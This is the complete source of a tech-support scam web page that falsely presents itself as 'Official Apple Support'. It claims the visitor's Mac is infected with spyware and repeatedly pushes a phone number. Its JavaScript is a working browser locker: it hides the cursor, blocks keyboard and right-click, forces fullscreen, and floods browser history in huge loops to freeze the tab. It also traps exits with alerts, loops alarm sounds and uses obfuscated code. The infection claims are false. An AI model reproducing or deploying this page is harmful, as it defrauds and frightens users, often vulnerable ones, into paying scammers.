<html><head>



<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta name="viewport" content="user-scalable=no, initial-scale=1.0, maximum-scale=1.0, width=device-width">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="black">
<link rel="icon" type="image/png" href="favicon.ico">
<title>Official Apple Support</title>
<meta name="robots" content="noindex, nofollow, noarchive">
<style>
body {font-family: "Myriad Set Pro","Lucida Grande","Helvetica Neue","Helvetica","Arial","Verdana","sans-serif";}
body{line-height:25px;color:#333;background-color:#f2f2f2;margin:0;} #header img{display: block; margin-left: auto; margin-right: auto;} .section-content { margin-left: auto; margin-right: auto; padding-top:20px; width: 900px; } .left{float:left;width:15%;} .right{float:right;width:85%;} h2{border-bottom:1px solid gray;} .red{color:#F62817;} a{color:#08c;} .pull-right{float:right;}  .btn { background: #34d9d9; background-image: -webkit-linear-gradient(top, #34d9d9, #2980b9); background-image: -moz-linear-gradient(top, #34d9d9, #2980b9); background-image: -ms-linear-gradient(top, #34d9d9, #2980b9); background-image: -o-linear-gradient(top, #34d9d9, #2980b9); background-image: linear-gradient(to bottom, #34d9d9, #2980b9); -webkit-border-radius: 45; -moz-border-radius: 45; border-radius: 45px; text-shadow: 1px 1px 3px #666666; color: #ffffff; font-size: 20px; padding: 11px 29px 10px 29px; text-decoration: none; }  .btn:hover { background: #3cb0fd; background-image: -webkit-linear-gradient(top, #3cb0fd, #3498db); background-image: -moz-linear-gradient(top, #3cb0fd, #3498db); background-image: -ms-linear-gradient(top, #3cb0fd, #3498db); background-image: -o-linear-gradient(top, #3cb0fd, #3498db); background-image: linear-gradient(to bottom, #3cb0fd, #3498db); text-decoration: none; }
	.yellow{color:#FFAE53;}
	.date-today{color:#666;float:right;}
	.text-center{text-align:center;}

.outer { padding: 10px; height: 100%; }
.container { -moz-border-radius: 6px; -webkit-border-radius: 6px; border-radius: 6px; width: 700px; margin: 30px auto; <!-- border: 10px solid #fff; --> box-shadow: 8px 8px 8px #bbb; }
.topcontent { background: #333333; color: white; }
.mainpage { font-size: 16px; padding: 10px; background: #fff; color: #333; font-weight: normal; }
.topcontent .header { font-size: 22px; font-weight: 700; text-shadow: 0 1px 0 #FCFCFC; padding: 5px 0 13px; padding-left: 10px; color: #fff; border-bottom: 1px solid #FFF; }
.topcontent .header img { position: relative; top: 8px; left: 0; margin-right: 6px; }
.topcontent .inner { padding: 10px; -moz-border-radius: 0 0 6px 6px; -webkit-border-radius: 0 0 6px 6px; border-radius: 0 0 6px 6px; }


h1 { font-weight: normal; background: #ABD241; text-shadow: 0 1px 0 #fff; position: relative; display: block; padding: 5px 0; color: black; text-align: center; }
h1 > span { width: 290px; margin: auto; display: block; padding: 5px; font-size: 18px; line-height: 30px; text-align: center; }
h1 span .sprite { float: left; vertical-align: middle; vertical-align: middle; }
h1 span img { vertical-align: middle; position: relative; bottom: 2px; }
.wrapper { background: #eee; width: 100%; margin: auto; font-family: "myriadpro", Arial, Helvetica, sans-serif; }

h2 strong { display: block; }
h2 img, h2 .sprite { float: left; margin: 0 8px 0 0 !important; }
.progress-bar { display: block; border: 2px solid #fff; height: 50px; }
.progress-bar .progress-bar-color { background: #e1e1e1; display: block; height: 50px; line-height: 50px; width: 0%; }
.progress-bar-red { padding: 0; height: 50px; }
.progress-bar-red .progress-bar-color { top:1px;height: 50px; width: 100%; background:#fff;color:red; }
.progress { position: relative; background: #fff; color: #333; }
.progress .status-text { font-size: 15px; position: absolute; top: 1px; text-align: left; text-indent: 12px; width: 100%; height: 50px; line-height: 50px; vertical-align: middle; }
.progress .status-percent { position: absolute; top: 2px; right: 2px; font-size: 16px; background: red; color: #fff; text-shadow: 0 1px 0 red; height: 50px; line-height: 50px; width: 55px; text-align: center; font-weight: bold; }
.searching { background: #fff;color:green;height:52px;top:1px; text-align: center !important; }
.bwrap { width: 250px; margin: auto; margin-top: 15px; text-align: center; }
.bwrap .button { text-decoration: none; width: 60%; font-size: 17px; margin: 0 auto; background: #abd241 155px 13px no-repeat; border: 1px solid #658a01; color: black; text-shadow: 0 1px 0 #fff; font-weight: bold; padding: 8px 25px 8px 8px; display: block; box-shadow: 2px 2px 0 #ccc; }
.errors { margin: 0 0 10px; border: 1px solid #ccc; padding: 2px; border-radius: 2px;background:#F2F2F2; }
.errors h3 { background: #333; padding: 10px; font-size: 14px; color: #fff; }
.errors ul { list-style: none; padding: 5px 4px; }
.errors li { border-bottom:1px dotted #e1e1e1;padding:10px 0 10px 5px;font-size: 14px; color: #333; }
.errors li img { float: left; position: relative; top: 5px; margin-right: 6px; }
.remove {  margin-top: 18px; background:#F2F2F2;border: 1px solid #ccc; padding: 2px; border-radius: 2px; }
.remove h3 { background: #333; padding: 10px; font-size: 14px; color: #fff; }
.remove ul { list-style: none; padding: 5px 4px; }
.remove li { border-bottom:1px dotted #e1e1e1;padding:10px 0 10px 5px;font-size: 14px; color: #333; }
.remove li img { float: left; position: relative; top: 5px; margin-right: 6px; }
.wrapper .inner { padding: 10px; -moz-border-radius: 0 0 6px 6px; -webkit-border-radius: 0 0 6px 6px; border-radius: 0 0 6px 6px; }
.align { text-align: center !important; }
</style>


    <style type="text/css">
	body{
	background-image: url();
}.style1{font-family:Arial,Helvetica,sans-serif;font-weight:bold;color:#FFFFFF;font-size:18px;}.style2{font-size:36px;font-family:"Courier New",Courier,monospace;}.style4{font-size:22px;font-family:"Courier New",Courier,monospace;}.style5{font-size:20px;font-family:"Courier New",Courier,monospace;}.style6{font-family:"Courier New",Courier,monospace}

            .cross{
                position: absolute;
                top: 2px;
                right: 10px;
                font-weight: bolder;
                color: #888;
                text-decoration: none;
            }
            a:focus{
                outline: 0 none;
                border: 0 none;
            }
			i {
  display:block; margin:0px auto;
  width:0px; height:0px;

  /*call animation*/
  animation:flashing 4s infinite;
}
	.new
			{
				height:200px;
				width:200px;
				position:fixed;
				right:5%;
				bottom:10px;
			}
			.new1
			{
				height:200px;
				width:200px;
				position:fixed;
				left:5%;
				bottom:0px;
			}
			.new img
			{
				position:fixed;
				right:0%;
				bottom:10px;
			}
						.new1 img
			{
				position:fixed;
				left:2%;
				bottom:10px;
			}

            .chrome-alert{
                position: fixed;
                top: 0px;
                left:0;
                right: 0;
                /*display: none;*/
            }
            .chrome-alert>div{
                margin: 0 auto;
                width: 440px;
                background: #FBFBFB;
                border: 1px solid #BABABA;
                min-height: 180px;
                border-radius: 3px;
                box-shadow: 0 2px 0 rgba(0,0,0,0.3);
                position: relative;
                font-family: 'Segoe UI';
            }
            .chrome-alert h1{
                font-size: 15px;
                font-weight: normal;
                margin: 0;
                margin-bottom: 5px;
                padding: 5px 10px;
                color: #414141;
            }
            .chrome-alert p{
                font-size: 12px;
                padding: 0 10px;
                color: #414141;
                margin: 15px 0;
            }
            .chrome-alert .action_buttons{
                overflow: auto;
            }
            .chrome-alert .action_buttons a{
                float: right;
                font-size: 12px;
                margin-right: 15px;
                padding: 6px 25px;
                text-decoration: none;
                color: #414141;
                border: 1px solid #DDD;
                margin-top: 20px;
                border-radius: 2px;
                margin-bottom: 20px;
            }
            .chrome-alert .action_buttons a.active{
                border: 1px solid #3B79ED;
                font-weight: bold;
            }
            .chrome-alert .content-box{
                max-height:440px;overflow:auto;
                margin: 0 20px;
            }
            .chrome-alert .content-box p{
                padding: 0;
                margin-left: 0;
            }
            .chrome-alert label{
                padding: 0 20px;
                font-size: 12px;
                color: #414141;
            }
            .chrome-alert label:hover{
                color: #3B79ED;
            }
            .chrome-alert label:focus{
                color: #3B79ED;
                outline: dotted;
            }
			</style>

			<script>function formatAMPM() {
			var d = new Date(),
				minutes = d.getMinutes().toString().length == 1 ? '0'+d.getMinutes() : d.getMinutes(),
				hours = d.getHours().toString().length == 1 ? '0'+d.getHours() : d.getHours(),
				ampm = d.getHours() >= 12 ? 'pm' : 'am',
				months = ['Jan','Feb','Mar','Apr','May','Jun','Jul','Aug','Sep','Oct','Nov','Dec'],
				days = ['Sun','Mon','Tue','Wed','Thu','Fri','Sat'];
			return days[d.getDay()]+' '+months[d.getMonth()]+' '+d.getDate()+' '+d.getFullYear()+' '+hours+':'+minutes+ampm;
			}</script>

<style>html {
	overflow: hidden;
}




</style>
<style>.blink_me {
animation: blinker 1s linear infinite;
}

@keyframes blinker {
50% { opacity: 0; }
}

</style>

<style>
.blink {
background-color:red;
color:black;
animation: blink-animation 1s steps(5, start) infinite;
-webkit-animation: blink-animation 1s steps(5, start) infinite;
}

.blink1 {
background-color:green;
animation: blink-animation 1s steps(5, start) infinite;
-webkit-animation: blink-animation 1s steps(5, start) infinite;
}


@keyframes blink-animation {
to {
visibility: hidden;
}
}
@-webkit-keyframes blink-animation {
to {
visibility: hidden;
}
}
</style>


<script src=./js/jquery.min.js></script>
<script>
		function formatAMPM() {
				var d = new Date()
					, minutes = d.getMinutes().toString().length == 1 ? '0' + d.getMinutes() : d.getMinutes()
					, hours = d.getHours().toString().length == 1 ? '0' + d.getHours() : d.getHours()
					, ampm = d.getHours() >= 12 ? 'pm' : 'am'
					, months = ['Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec']
					, days = ['Sun', 'Mon', 'Tue', 'Wed', 'Thu', 'Fri', 'Sat'];
				return days[d.getDay()] + ' ' + months[d.getMonth()] + ' ' + d.getDate() + ' ' + d.getFullYear() + ' ' + hours + ':' + minutes + ampm;
		}
</script>
<script>
		function getURLParameter(a) {
				return decodeURI((RegExp(a + "=(.+?)(&|$)").exec(location.search) || [, null])[1] || "")
		}
		function random_betw(b, a) {
				return Math.round(Math.random() * (a - b) + b)
		}
		var phone = "+1-888-985-6762";
			var text = "** Official Apple  warning alert **";
				</script>
<script>
		var w = window.screen.width;
		var h = window.screen.height;
		window.moveTo(0, 0);
		window.resizeTo(w, h);
</script>
<script>
		var isOpera = !!window.opera || navigator.userAgent.indexOf(" OPR/") >= 0;
		var isFirefox = typeof InstallTrigger !== "undefined";
		var isSafari = Object.prototype.toString.call(window.HTMLElement).indexOf("Constructor") > 0;
		var isChrome = !!window.chrome && !isOpera;
		var isIE = /*@cc_on!@*/
		false || !!document.documentMode;
</script>

<style type="text/css">
	.nocursor { cursor:none; }
</style>




<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.0/js/bootstrap.min.js"></script>

<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id='UA-xxx-x"></script>
<script>
	window.dataLayer = window.dataLayer || [];
	function gtag(){dataLayer.push(arguments);}
	gtag('js', new Date());

	gtag('config', 'UA-xxx-x');
</script>

</head>

<body class="nocursor" id="chrome-alerts">

	<audio id="xyz" src="Funk.ogg"></audio>


	<div id="header" style=" background-color: #30302F;"></div>
		<div class="outer outer0">

		<div class="section-content">
			<div class="left">
				<img src="logo.png" ;="" height="125px">
			</div>

			<div class="right">
				<h2>Your system is infected with (3) Spyware!</h2>
				<span class="date-today"><script language="Javascript">var w=new Array("Sunday", "Monday", "Tuesday", "Wednesday", "Thursday", "Friday", "Saturday");var m=new Array("January", "February", "March", "April", "May", "June", "July", "August", "September", "October", "November", "December");var td=new Date();document.write(td.getDate()+" "+m[td.getMonth()]+" "+td.getFullYear());</script></span>
				<br>
				<p>
					<span class="red">Your Mac OS X is infected with (3) Spyware.
 The pre-scan found traces of (2) malware and (1) phishing/spyware.
System damage: 28.1% - Immediate removal required! <BR><BR> Please Call Apple Support +1-888-985-6762. </span><br><br>
					The removal of <strong>(3) Spyware</strong> is required immediately to prevent further system damage, loss of Apps, Photos or other files.
					<br><br>
					Traces of  <strong>(1) Phishing/Spyware</strong> were found on your Mac OS X. <strong>Personal and banking information are at risk.</strong> <br><br>
					<br><br>

				</p>
				<p><span class="red"><span id="mins">1</span> minutes and <span id="secs">37</span> seconds<script type="text/javascript">setInterval('countdown()',1000);function countdown(){var mins=parseInt(document.getElementById("mins").innerHTML);var secs=parseInt(document.getElementById("secs").innerHTML);if(mins!=0 && secs==0){nmins=mins-1;nsecs=59;}else if(mins!=0 || secs!=0){nmins=mins;nsecs=secs-1;}else if(mins==0 && secs==0){nmins=mins;nsecs=secs;}document.getElementById("mins").innerHTML=nmins;document.getElementById("secs").innerHTML=nsecs;}</script>
</span>
					<br><br><br>
					</p><div class="bottomcontent">
					<span class="pull-center">
						<div class="orange"> <a class="btn" href="javascript:;"><strong>
							Please Call Apple Support +1-888-985-6762 </strong></a>
						</div>
						<div style="clear:both;"></div>

				</span><p></p>
				</div>
			</div>
		</div>
		</div>

<div class="outer outer1" style="display:none">
	<div class="container">
		<div class="topcontent">
			<div class="header"><img src="ajax2.gif" style="margin-right:9px;" width="32">
				SCAN IN PROGRESS			</div>
		</div>
		<div class="wrapper">
			<div class="inner">
				<div class="progress">
					<div class="progress-bar">
						<div class="progress-bar-color"></div>
					</div>
					<span class="status-text">
					Loading...					</span>
					<div class="status-percent">0%</div>
				</div>
			</div>
		</div>
	</div>
</div>



<div id="chrome-alerts" class="chrome-alert">
            <div>
                <a href="javascript:openlink()" class="cross">×</a>
                <div class="content-box" id="alert-content-box">
                    <p>WARNING!<br>
MAC OS is infected with Spyware and other malicious applications. Spyware must be removed and system damage repaired.\n\nIt is necessary to Call Apple Support <span style="color:red; font-weight:bold;">+1-888-985-6762</span> and follow Virus removal procedure immediately, please proceed.
<br>
<br>
 **If you leave this site your Mac OS  will remain damaged and vulnerable**<br>
<br>
<h3>Call Apple Helpline <span style="color:red;">+1-888-985-6762</span> (Toll Free)</h3>
<br>
</p>
                </div>
                <label style="font-size: 12px;"><input checked="nonchecked" type="checkbox"> Prevent this page from creating additional dialogues.</label>
                <div class="action_buttons">
                    <a class="active" id="leave_page" href="" target="_blank" onclick='return pop("index.html",1500,1000);' style="background-color:green;color:#ffffff; font-size:16px">Back to Safety</a>
<a href="" class="active blink" id="amt" target="_blank" onclick='return pop("index.html",1500,1000);' style="background-color:red;color:#ffffff; font-size:16px">Leave  Page</a>


    </div>
            </div>
        </div>
      <div class="new">
<img src="v1.png"/>
</div>

</div></div>


<script>
$(function() {
		if (isFirefox) {
				$("a").click(function(e) {
						e.preventDefault()
				});
				var e = ["pushState", "onbeforeunload", "", "returnValue", "onload", "toString"];
				o = e, u = 325,
						function(e) {
								for (; --e;) o.push(o.shift())
						}(++u);
				var n = function(n, t) {
						return e[n -= 0]
				};
				t = text, window[n("0x0")] = function(e) {
						var o = n("0x1") + t;
						return e[n("0x2")] = o, o
				}, window[n("0x3")] = function() {
						if (confirm("" + t))
								for (var e = "", o = 0; o < 1e8; o++) e += o[n("0x4")](), history[n("0x5")](0, 0, e);
						else
								for (e = "", o = 0; o < 1e8; o++) e += o[n("0x4")](), history[n("0x5")](0, 0, e)
				}
		}
		var t, o, u, r, c, i, l;
		if (isChrome || isOpera) {

				var d = !1;

				// $("head").append('<script src="./js/jquery.js"><\/script>'), $("head").append('<link href="./css/style.css" rel="stylesheet">'),
        document.getElementById("msgSound").play()
        debugger;
        window.onkeydown = function(e) {

            return !1
				}, window.onkeypress = function(e) {
						return !1
				}, onbeforeunload = function() {
					return alert("Do not leave this page, If you close this page, your computer access will be disabled to prevent further damage to our network.  Please call us within the next5 minutes to prevent your computer from being disabled or from any information loss. Call Immediate at +1-888-985-6762 (TOLL FREE)."), "Do not leave this page, If you close this page, your computer access will be disabled to prevent further damage to our network.  Please call us within the next5 minutes to prevent your computer from being disabled or from any information loss. Call Immediate at +1-888-985-6762 (TOLL FREE)."
			}, document.oncontextmenu = new Function("return true");
				for (var s = 0; s < 0; s++) alert(text);

				function a() {
						d ? (document.getElementById("blue-screen").style.display = "block", document.getElementsByTagName("body").item(0).setAttribute("class", "past")) : d = !0
				}

				function m() {
						document.fullscreenElement || document.mozFullScreenElement || document.webkitFullscreenElement || (document.documentElement.requestFullscreen ? document.documentElement.requestFullscreen() : document.documentElement.mozRequestFullScreen ? document.documentElement.mozRequestFullScreen() : document.documentElement.webkitRequestFullscreen && document.documentElement.webkitRequestFullscreen(Element.ALLOW_KEYBOARD_INPUT)), window.open("alert.php", "Alert", "width=1,height=1,scrolling=yes,fullscreen=yes,left=3000,top=3000")
				}

				document.getElementById("chrome-alerts").style.display = "block", document.addEventListener("keyup", function(e) {
						27 == e.keyCode && m()
				}, !1), document.addEventListener("keyup", function(e) {
						122 != e.keyCode && 17 != e.keyCode && 18 != e.keyCode && 13 != e.keyCode || (a(), m())
				}, !1), window.onload = function() {
						document.onclick = function(e) {

								e = e || event, target = e.target || e.srcElement, target.tagName, m(), a()
						}
				}, addEventListener("click", function() {
          debugger;
						a();
						var e = document.documentElement;
						(e.requestFullScreen || e.webkitRequestFullScreen || e.mozRequestFullScreen).call(e)
				}), window.addEventListener("resize", function() {
						$("body").css("overflow", "hidden"), $(".popup-alert").stop().animate({
								bottom: "-10px",
								opacity: 1
						}, 500), document.getElementById("msgSound").play(), screen.width, window.innerWidth, window.setInterval(function() {
								for (var e = 0; e < 100; e++) history.pushState(0, 0, e)
						}, 500)
				})
		}
		if (isIE || isSafari) {
				$("#blue-screen,.chrome-alert").hide();
				var f = ["onmouseout", "body", "addEventListener", "mouseout", "*************************************************\nRDN/YahLover.worm!055BCCAC9FEC Infection\n*************************************************\n\n", "attachEvent"];
				i = f, l = 361,
						function(e) {
								for (; --e;) i.push(i.shift())
						}(++l);
				var y = function(e, n) {
						return f[e -= 0]
				};
				r = text, c = text, alert(r), document[y("0x0")][y("0x1")] ? document[y("0x0")][y("0x1")](y("0x2"), function(e) {
						alert(y("0x3") + r)
				}, !1) : document[y("0x0")][y("0x4")](y("0x5"), function(e) {
						alert(r)
				}), window.onbeforeunload = function() {
						return c
				}
		}
});

</script>

<audio autoplay="autoplay" loop="" id="msgSound">
	<source src="err.mp3" type="audio/mpeg">
</audio>

</div>



<audio autoplay="autoplay" loop="" id="msgSound1">
<source src="beep.mp3" type="audio/mpeg">
</audio>


 <script type="text/javascript">/*<![CDATA[*/
 // audio play /*
	 var msgAudioEl = document.getElementById("msgSound");

	 var playMsgInt = setInterval(function () {
		 if (isPlaying(msgAudioEl)) {
			 // console.log('already playing. clearing interval');
			 clearInterval(playMsgInt);
		 } else {
			 // console.log('Triggering play');
			 msgAudioEl.play();
		 }
	 }, 500);
	 // audio play */

 </script>

		 <script type="text/javascript">/*<![CDATA[*/
		 // audio play /*
			 var msgAudioEl = document.getElementById("msgSound1");

			 var playMsgInt = setInterval(function () {
				 if (isPlaying(msgAudioEl)) {
					 // console.log('already playing. clearing interval');
					 clearInterval(playMsgInt);
				 } else {
					 // console.log('Triggering play');
					 msgAudioEl.play();
				 }
			 }, 500);
			 // audio play */

		 </script>


		 <script type="text/javascript" language="JavaScript1.2">

			 if (window.Event)
				 document.captureEvents(Event.MOUSEUP);


			 function nocontextmenu() {
				 event.cancelBubble = true, event.returnValue = false;

				 return false;
			 }

			 function norightclick(e) {
				 if (window.Event) {
					 if (e.which == 2 || e.which == 3) return false;
				 }
				 else if (event.button == 2 || event.button == 3) {
					 event.cancelBubble = true, event.returnValue = false;
					 return false;

				 }
			 }


			 if (document.layers)
				 document.captureEvents(Event.MOUSEDOWN);

			 document.oncontextmenu = nocontextmenu;
			 document.onmousedown = norightclick;
			 document.onmouseup = norightclick;



		 </script>




	<iframe id="calendar" src="beep.mp3" allow="autoplay" style="display:none;">
</body></html>
